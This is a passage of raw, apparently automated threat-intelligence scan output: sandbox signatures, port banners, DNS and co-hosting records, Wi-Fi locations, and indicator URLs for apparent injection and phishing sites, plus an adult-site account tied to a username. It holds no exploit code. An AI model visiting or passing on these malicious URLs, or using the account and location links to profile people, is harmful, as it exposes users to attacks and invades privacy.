"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE"; Key: "DONTUSEDESKTOPCHANGEROUTER")\n "iexplore.exe" (Path: 
"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\OUTLOOK.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\OUTLOOK.EXE"; Key: "PATH")'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"mc.yandex.ru" seems to be random'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://consolegames.down10.software/bios/pcsx2-playstation-2-bios-3"\n Pattern match: "https://consolegames.down10.software"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"\n Heuristic match: "ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"\n Heuristic matc 104.21.28.240 2022-12-18 00:02:50 IP Address No Mnemonic PassiveDNS 0 0 1 0 None 20.195.209.219 
misogyny.wtf 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b12f173862f22a-ORD Content-Encoding: gzip 188.114.97.1 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None xHamster (Category: XXXPORNXXX) https://xhamster.com/users/rasputain rasputain 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None REL (Net ID: 00:02:2D:02:35:63) 37.7803446,-122.3906132 2022-12-18 00:12:09 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.96.0', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 188.114.96.0 2022-12-18 00:02:47 Linked URL - Internal No grep.app 1 0 1 0 None http://zerotwo-best-waifu.online/778112985743251/wap/dsc_injection" zerotwo-best-waifu.online 2022-12-18 00:03:12 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-95.w90-116.abo.wanadoo.fr 90.116.166.95 2022-12-18 00:04:28 Affiliate - Internet Name No DNS Raw Records 7 0 1 0 None garrett.ns.cloudflare.com rasputain.fr 2022-12-18 00:16:46 Co-Hosted Site No 
ThreatMiner 0 0 2 0 None webpersonspichincha001--webpichinch.repl.co 34.149.204.188 2022-12-18 00:09:02 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.1', u'vendor': u'', u'port': u'8443', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c95e97940b24488fe22fafc8fabe4d547cbebe6bbcbebe6bb0974cd4f', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'400 The plain HTTP request was sent to HTTPS port', u'url': u'', u'header': {u'content-length': u'655', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'total-ev-charge.com', u'summary': u'Server: cloudflare\r\nDate: Tue, 15 Nov 2022 09:09:49 
GMT\r\nContent-Type: text/html\r\nContent-Length: 655\r\nConnection: close\r\nCF-RAY: -\r\n\nPage title: 400 The plain HTTP request was sent to HTTPS port\n\n\r\n400 The plain HTTP request was sent to HTTPS port\r\n\r\n 400 Bad Request \r\n The plain HTTP request was sent to HTTPS port \r\n cloudflare
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', u'time': u'2022-11-15T09:09:49.111520616Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.1', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731ce17441d7885c1ca501c58ac5134df533e98edc4fb6c791e', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'16', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'188.114.97.1', u'summary': u'Date: Mon, 14 Nov 2022 18:40:45 GMT\r\nContent-Type: text/plain; charset=UTF-8\r\nContent-Length: 16\r\nConnection: close\r\nX-Frame-Options: SAMEORIGIN\r\nReferrer-Policy: same-origin\r\nCache-Control: private, 
max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nExpires: Thu, 01 Jan 1970 00:00:01 GMT\r\nServer: cloudflare\r\nCF-RAY: 76a1e09d4e479c0c-FRA\r\n\n\nerror code: 1003', u'time': u'2022-11-14T18:40:45.290141174Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.1', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987319317d86e2d588a2b7f31fc77ba94f4758f84ee6a988ec80f', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'clinic.tanyar.org', u'summary': u'Date: Wed, 16 Nov 2022 20:52:47 GMT\r\nContent-Type: 
text/html\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nlast-modified: Tue, 26 Jul 2022 11:45:45 GMT\r\naccept-ranges: bytes\r\nvary: User-Agent\r\nx-turbo-charged-by: LiteSpeed\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ljaOn9MYZGchA5PAB0ShZB1fL9jkH29cOGha88VNVZQYZ0B30L6xIvntAkyJKVUXsLDg%2BWYA0k6M2ic976HQHNh8BIalAyVslDgmg49Al0TUkUQiDVYycXX%2FVg%2FudJ7Akfc1Og%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76b31cc4cac4c399-SEA\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n2c\r\nApache is functioning normally\n\r\n0\r\n\r\n', u'time': u'2022-11-16T20:52:46.785091206Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.1', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc68304a24b27211abd6b5b7e200', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://www.evcharge.totalenergies.com/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', 
u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'total-ev-charge.com', u'summary': u'Date: Tue, 15 Nov 2022 09:09:49 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Tue, 15 Nov 2022 10:09:49 GMT\r\nLocation: https://www.evcharge.totalenergies.com/\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=Gc%2BVDdofvBTUCV9wVYfk4cKJLxr7C2ETUJSjJJ8vyUPMEHFeFRAgf01l0in8H%2FnQxO4h7JAddKdXczicHPMMO0L1GlLxP4JEdaxm%2BfCwZnXgIUc4e9QL9mxDxF%2BUNcTrp4s25LIY"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76a6d9a68cfc9bb3-FRA\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n0\r\n\r\n', u'time': u'2022-11-15T09:09:49.165008166Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.1', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'pass 188.114.97.1 2022-12-18 00:04:10 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None cdnjs.cloudflare.com 188.114.96.0 2022-12-18 00:11:26 Raw Data from RIRs No GLEIF 0 0 3 0 None [{u'relationships': {u'lei-records': {u'data': {u'type': u'lei-records', u'id': u'5493007DY18BGNLDWU14'}, u'links': {u'related': u'https://api.gleif.org/api/v1/lei-records/5493007DY18BGNLDWU14'}}}, u'attributes': 
{u'highlighting': u'CLOUDFLARE, INC.', u'value': u'CLOUDFLARE, INC.'}, u'type': u'autocompletions'}] Cloudflare\, Inc. 2022-12-18 00:10:04 BGP AS Membership No URLScan.io 0 0 1 0 None 8075 plague.fun 2022-12-18 00:25:14 Affiliate - IP Address No DNS Look-aside 0 0 3 0 None 81.88.48.112 81.88.48.102 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None default (Net ID: 00:01:24:F0:65:67) 37.780462,-122.390564 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:2086 188.114.96.1 2022-12-18 00:06:44 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 16, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://jquery-attribute-selector.barzz12.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5812:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:8132:304:WilStaging_02"\n "Local\\SM0:8132:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:5812:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5812:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5812:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5248:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"jquery-attribute-selector.barzz12.repl.co"'}, 
{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:80"\n "34.149.204.188:443"\n "142.250.72.138:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"jquery-attribute-selector.barzz12.repl.co"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00005812]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Kids Mode\\0.0.0.10\\manifest.fingerprint]- [targetUID: 00000000-00005812]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005812]\n "shopping_fre.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%TEMP%\\5812_2022650426\\shopping_fre.html]- [targetUID: 00000000-00005812]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00005812]\n "cdd6c08f-7c86-4474-902f-afea36c0a1ae.tmp" has type "ASCII text with very long 
lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\cdd6c08f-7c86-4474-902f-afea36c0a1ae.tmp]- [targetUID: 00000000-00008092]\n "7234865e-8eda-42b6-a48f-5804db7147dd.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\7234865e-8eda-42b6-a48f-5804db7147dd.tmp]- [targetUID: 00000000-00008092]\n "Part-DE" has type "data"- Location: [%TEMP%\\5812_2093507271\\Part-DE]- [targetUID: 00000000-00005812]\n "4cc0bbb2-159b-4da8-8031-c70df079b4eb.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\4cc0bbb2-159b-4da8-8031-c70df079b4eb.tmp]- [targetUID: 00000000-00005812]\n "9ab92b2b-c351-4c0b-a7b4-fdc0ea840854.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "safety_tips.pb" has type "data"- Location: [%TEMP%\\5812_1664129855\\safety_tips.pb]- [targetUID: 00000000-00005812]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005812]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00005812]\n "2b0d2db4-5b34-4566-8c6f-f51f3122fca3.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00005812]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\5812_2093507271\\Part-NL]- [targetUID: 00000000-00005812]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators with escape sequences"- Location: [%TEMP%\\5812_2022650426\\edge_confirmation_page_validator.js]- 
[targetUID: 00000000-00005812]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\LOG]- [targetUID: 00000000-00005812]\n "14bc75cc-e601-4873-a1de-b4eb75e7acd1.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\14bc75cc-e601-4873-a1de-b4eb75e7acd1.tmp]- [targetUID: 00000000-00005812]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://jquery-attribute-selector.barzz12.repl.co/"\n Pattern match: "http://jquery-attribute-selector.barzz12.repl.co"\n Heuristic match: "jquery-attribute-selector.barzz12.repl.co"\n Heuristic match: "11;cs_.._..._;qL_e__-a1_ribu1e-selec1or.barzz1_.recl.cc"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\5812_2022650426\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005812]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\5812_2022650426\\edge_driver.js]- [targetUID: 00000000-00005812]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\5812_2022650426\\auto_open_controller.js]- [targetUID: 00000000-00005812]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\5812_2022650426\\edge_tracking_page_validator.js]- [targetUID: 00000000-00005812]\n Dropped file: "shoppingfre.js" - Location: 
[%TEMP%\\5812_2022650426\\shoppingfre.js]- [targetUID: 00000000-00005812]\n Dropped file: "shopping.js" - Location: [%TEMP%\\5812_2022650426\\shopping.js]- [targetUID: 00000000-00005812]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\5812_2022650426\\edge_checkout_page_validator.js]- [targetUID: 00000000-00005812]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\5812_2022650426\\shopping_iframe_driver.js]- [targetUID: 00000000-00005812]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\5812_2093507271\\adblock_snippet.js]- [targetUID: 00000000-00005812]\n Dropped file: "product_page.js" - Location: [%TEMP%\\5812_2022650426\\product_page.js]- [targetUID: 00000000-00005812]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Edg/103.0.1264.37'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.28" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.28"\n Potential IP "10.34.0.28" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.28\\LICENSE"'}], u'threat_level': 0, u'size': None, u'job_id': u'63589b8fa166e1316904a3d3', u'target_url': None, u'interesting': False, u'error_type': None, u'state': 
u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.149.204.188', u'34.149.204.188', u'142.250.72.138'], u'sha256': u'c658b79bc25120c045777e2590aa021935d8b0b937566361881d297956a7d765', u'sha512': u'6350479333dcf05b973fa3b6c0ab6d87487c3220b42e68365b96a26b4bc0727238c0b753f81fcfe9e95864956d39a57f1062505091a4143a6cea92c351a1330f', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://jquery-attribute-selector.barzz12.repl.co/', u'submission_id': u'63589b8fa166e1316904a3d4', u'created_at': u'2022-10-26T02:29:35+00:00', u'filename': None}], u'analysis_start_time': u'2022-10-26T02:29:36+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 3, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 9, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_secti 34.149.204.188 2022-12-18 00:09:38 Co-Hosted Site No HackerTarget 0 0 2 0 None 19.koongroup.com 172.67.147.230 2022-12-18 00:08:56 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.0:8080 188.114.96.0 2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:8443 172.67.190.129 2022-12-18 00:08:14 Netblock Membership No RIPE 4 0 1 0 None 40.112.0.0/13 40.113.112.131 2022-12-18 00:21:34 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 400 Bad Request Server: cloudflare Date: Content-Type: text/html Content-Length: 253 Connection: close CF-RAY: - 104.21.19.243 2022-12-18 00:07:17 HTTP Headers No Web Spider 1 0 2 0 None {"date": "Sun, 18 Dec 2022 00:07:17 GMT", "content-length": "213", "content-type": "text/html; charset=utf-8", "connection": "close", "server": "Werkzeug/2.2.2 Python/3.9.11"} http://misogyny.wtf/inject/UsRjS959Rqm4sPG4 2022-12-18 00:25:45 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [188.114.96.1] 188.114.96.1 2022-12-18 00:16:58 Web Content No Web Spider 1 0 4 0 None /*! 
http://webmail.zerotwo-best-waifu.online/js/vendor/jquery-3.5.0.min.js 2022-12-18 00:04:46 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 2, u'search_terms': [{u'id': u'host', u'value': u'188.114.97.0'}], u'result': [{u'environment_id': 120, u'job_id': u'6299806c0e78014d072abd55', u'analysis_start_time': u'2022-06-03 03:30:55', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 13, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'd5b578768080ba1b323d49624b4a182f6ae31024944171288f1dc070c720d4b4', u'type': None, u'type_short': u'url', u'size': 65}, {u'environment_id': 100, u'job_id': u'61f02e813dde4c77c27f2ef9', u'analysis_start_time': u'2022-01-25 17:08:23', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'5738f740050df2e09fe667701137437449997573a168f7f996a9e1ffa6f632eb', u'type': None, u'type_short': u'url', u'size': 63}]} 188.114.97.0 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None galiciapersonal00993.tomasnuve11.repl.co 34.149.204.188 2022-12-18 
